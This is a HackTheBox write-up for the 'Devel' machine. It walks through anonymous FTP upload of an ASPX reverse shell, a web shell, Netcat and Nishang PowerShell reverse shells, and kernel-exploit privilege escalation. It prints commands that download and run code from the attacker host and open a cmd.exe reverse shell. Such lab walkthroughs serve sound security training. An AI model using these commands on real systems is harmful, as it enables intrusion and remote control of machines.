Devel - HackTheBox Writeup
The link for this machine is located here: https://app.hackthebox.com/machines/3
In this room, we play around with anonymous FTP login to gain a meterpreter reverse shell. An alternative way is also covered using Netcat and manual priv esc for additional practice.
Full Walkthrough
First thing we can start with is by running an Nmap with the following parameters:
-p- for all ports
10.10.10.5 for the target IP
-oN allports.scan to output in Nmap/Normal format
This reveals only two ports open - FTP and HTTP. With this information, we can gather more information about these two services by running a more detailed Nmap scan.
This reveals that anonymous FTP access is allowed and that the files in there look like part of the IIS web page. Additionally, we see that the web server is running Microsoft IIS 7.5 - interesting.
A good idea is to first check out the website running:
It’s just a boring, default IIS7 web page - maybe it was just installed. In the FTP directory, we saw a file called welcome.png. It’s a good idea to check the source code to see if the image on the website is the same image as in the FTP directory (welcome.png).
It is! This is great for us and bad for them. This means that if we upload a malicious file to the FTP directory, we have a way to execute it on the server by navigating to it through the web browser.
To test this theory, we can create a simple test.txt file to start.
Then, we can login to the FTP server using anonymous:anonymous credentials.
Once logged in, we can use the “put” command to upload our test.txt file.
Finally, to test this works, we can try navigating to it by going to http://10.10.10.5/test.txt
It works! We see the contents and our file is accessible through the web site.
Knowing this, we can get evil. For starters, I will use Msfvenom to simply create a malicious ASPX file that uses a reverse TCP meterpreter shell that connects back to us on port 4444.
Then, I’ll start the exploit/multi/handler in Metasploit with the same options (PAYLOAD, LHOST, LPORT) in order to catch the meterpreter shell.
Finally, with this new malicious “shell.aspx” file, we can login to the FTP service once again and upload our file.
Then, with the handler listening for a connection, we can navigate to it in the browser to execute it.
Immediately, we get a connection back to our handler and a Meterpreter session is opened for us.
Unfortunately, it is not running as the SYSTEM user - time for privilege escalation.
The first good thing to do is drop into a shell and run the “systeminfo” command to get tons of information about the underlying system.
Here, we can a ton of information. In this case, the most important ones I identified were it is running Windows 7 Enterprise 6.1.7600, is a 32-bit system (x86-based) and looks like it doesn’t have any hotfixes installed.
With an OS as old as Windows 7, there is likely to be many exploitation paths for privilege escalation including kernel exploits. To save time, we can use the local exploit suggester module to see what it suggests we do.
As expected, this returns a ton of potential exploits we can use. If you’re new to pentesting/ethical hacking, you might go down this list one by one and seeing which ones work.
However, to save you time, one that works for me consistently is the kitrap0d exploit - let’s use it.
To use it, we simply set the following options:
SESSION (meterpreter session)
LHOST (our machine)
LPORT (a port we choose)
And then we run it.
Boom! We get another meterpreter session, this time running as NT AUTHORITY\SYSTEM.
We now fully own this machine and this box is complete!
Alternate Way
It’s always good to learn multiple ways to do things, especially for certain exams (looking at you OSCP) so let’s discuss what other ways could have been done.
For starters, we can decide to NOT use meterpreter, but instead just use a simple Windows shell instead.
Then, we would do the same thing - upload it to the FTP service by logging in anonymously and using the put command.
Then, before execution, we would start a Netcat listener on the same port specified in the MSFvenom command - in my case, port 4444.
Finally, we would execute it by navigating to it through the browser once again - this time, we get a reverse shell back on our Netcat listener.
For the privilege escalation, there are probably multiple ways again. But the easiest one for me was to look for manual kernel exploits.
To find them, I ran the same systeminfo command we did earlier and gathered the same information.
With this information, I did some research on this specific build and checked for any privilege escalation vectors we could use.
The first result is from Exploit-DB which is generally a reliable source. Looking at it, it seems if we successfully exploit this vulnerability, we can run code in kernel mode (i.e. as SYSTEM).
To download it, we can first identify its ID number at the top - in this case, 40564.
Then, we can provide this number to searchsploit using the “-m” parameter and download a local copy to our current directory.
Once downloaded, we can read the Exploit-DB description more and find out how to execute it.
First thing we need to do is compile it with the following command (I’m not going to pretend I understand this 100%, but feel free to read up on what it actually does).
After compiling, we get an executable. With this malicious executable ready, we can start a Python web server to host it.
Once running, we can use PowerShell through our shell to download it to a writeable directory - I choose C:\Users\Public\Downloads.
The full PowerShell command I ran is as follows:
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.4/40564.exe’, ‘C:\Users\Public\Downloads\40564.exe’)”
Once it is safely on the target, we can simply run it and escalate our privileges to SYSTEM.
Alternate Way 2
Pssst… What if I told there was yet another way to do this? Want to learn with me? Then let’s go!
Instead of simply uploading a malicious ASPX file that gives us a reverse shell, we could instead use a web shell that provides us a box to execute commands from.
First, I copied it from the SecLists directory into the current directory.
Once there, we do the same thing yet again (memorized it yet?) and upload the file using the FTP service.
However, once uploaded, if we navigate to it in the browser, we are presented with the following:
It provides us a box where we can input commands and execute them (or “excute” in this case, whoops!).
Using this, we can do something different - we can utilize Netcat on the target.
In the following, I made an SMB directory and copied the nc.exe windows binary into that directory for hosting purposes.
Once the directory is ready, we can utilize smbserver.py from Impacket to host an SMB share where we can download files from on the target (if they are on the same network!).
To start the SMB server, the following command was used:
sudo python /usr/share/doc/python3-impacket/examples/smbserver.py share smb/
Where:
smbserver.py is the program/script
share is the share name
smb is the protocol.
Once running, we can make sure it works by listing out the contents of the share through the command box.
It works and we see the nc.exe program is there.
Before executing, we need to start a Netcat listener on any port - I choose 9000.
Finally, let’s execute it by running the following command:
\\10.10.14.4\share\nc.exe -e cmd.exe 10.10.14.4 9000
This simply executes Netcat from our SMB share and uses it to send a command prompt back to our machine on port 9000.
After hitting execute, we get a reverse shell in our Netcat listener!
From here, we could do the same steps to escalate privileges but I’ll leave that for you to do since I’m lazy.
Alternate Way 3
I know what you’re thinking…. another one? Oh yes, welcome to the wonderful world of PowerShell.
To start, we can clone the following repository in order to get Nishang. In their words, Nishang is the following:
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
Once downloaded, I simply copied one script to my SMB server directory we used earlier - Invoke-PowerShellTcp.ps1
Once transferred, we can open it and read what it does.
Above, we see an example that will connect to an IP address and port. However, it’s just an example.
In order to actually execute that line, we can copy it and add it at the very bottom of the file, inputting our IP address and port we want to use.
Once edited, we can host the file using either an SMB server or a Python web server.
Finally, we can start a Netcat listener on that port to catch our shell.
Let’s run this bad boy! In this example, I still have the web shell active. Inside that web shell command box, I executed the following PowerShell command which downloaded the PS1 script and executed it, giving us a reverse shell:
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.4/Invoke-PowerShellTcp.ps1')
And that’s it! I promise, no more alternate ways to do this box - at least not that I want to show for now.
